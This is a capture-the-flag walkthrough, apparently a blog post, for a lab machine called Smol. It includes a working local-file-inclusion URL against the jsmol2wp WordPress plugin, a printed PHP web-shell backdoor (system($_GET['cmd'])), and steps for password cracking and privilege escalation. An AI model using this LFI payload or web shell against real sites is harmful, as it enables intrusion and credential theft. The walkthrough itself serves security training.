At the heart of Smol is a WordPress website, a common target due to its extensive plugin ecosystem. The machine showcases a publicly known vulnerable plugin, highlighting the risks of neglecting software updates and security patches. Enhancing the learning experience, Smol introduces a backdoored plugin, emphasizing the significance of meticulous code inspection before integrating third-party components.
Quick Tips: Do you know that on computers without GPU like the AttackBox, John The Ripper is faster than Hashcat?
Note: Please allow 4 minutes for the VM to fully boot up.
Flag 1
What is the user flag?
We first add <MACHINE IP> www.smol.thm in /etc/hosts to resolve the hostname.
Run wpscan --url http://www.smol.thm --plugins-detection passive -e ap.
We see the plugin enumerated is jsmol2wp, last updated in 2018. That is already a bad sign.
With further searches on Google, we see that it is vulnerable to local file inclusion.
Credit: https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
We can then exploit using the URL http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
We can use those credentials to get a login.
As we look at Profile -> Pages -> Webmaster Tasks!!, we see that the author uses Hello Dolly plugin.
As we look it up on GitHub, we see that the plugin uses the hello.php page.
We can access the page using LFI like http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php.
Within the PHP file, we see this.
When Base64 decoded, we get this.
To which the code will look like this when decoded in ASCII.
if (isset($_GET["cmd"])) {
system($_GET["cmd"]);
}
As we can see, there is room for remote code execution here.
As we navigate to the Dashboard, we see a message mentioning Dolly, indicating that Dolly is currently being used.
We can test the RCE vulnerability here. And sure enough, we get something back.
I then set up a listener on my machine and did a reverse shell to exploit the RCE.
We can then run ps auxww to check for any interesting processes running. We see that MySQL is running as seen below.
We can then run mysql -u wpuser -p then input the same password as before. And we get access the database.
I played around with the database a little bit, and eventually found these commands lead us to the credentials.
use wordpress;
select * from wp_users;
We then save all into a file. In my case I saved it as hashes.txt and crack it using JohnTheRipper by running john --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt.
We cracked our first one.
We then login using that password as diego.
navigate to /home/diego to get the flag.
Flag 2
What is the root flag?
As we check out think user's directory, we see that we can access the SSH key.
We can log in as think by running ssh think@www.smol.thm -i id_rsa.
After logging in as think, we can su gege to log in as gege, as gege has a ZIP file for us to investigate, as it is password protected.
We then export the ZIP file to our attacker machine for us to crack it.
We then run fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt wordpress.old.zip.
We can then use the cracked password to unzip the file.
After that, we see 1 file that caught our eye.
Upon reading that file, we see the credentials for xavi.
And now we are xavi.
As we ran sudo -l, we see that we can run sudo with everything, meaning we are essentially root once we run a command such as sudo su.
We then navigate to /root to get the flag.
Top comments (0)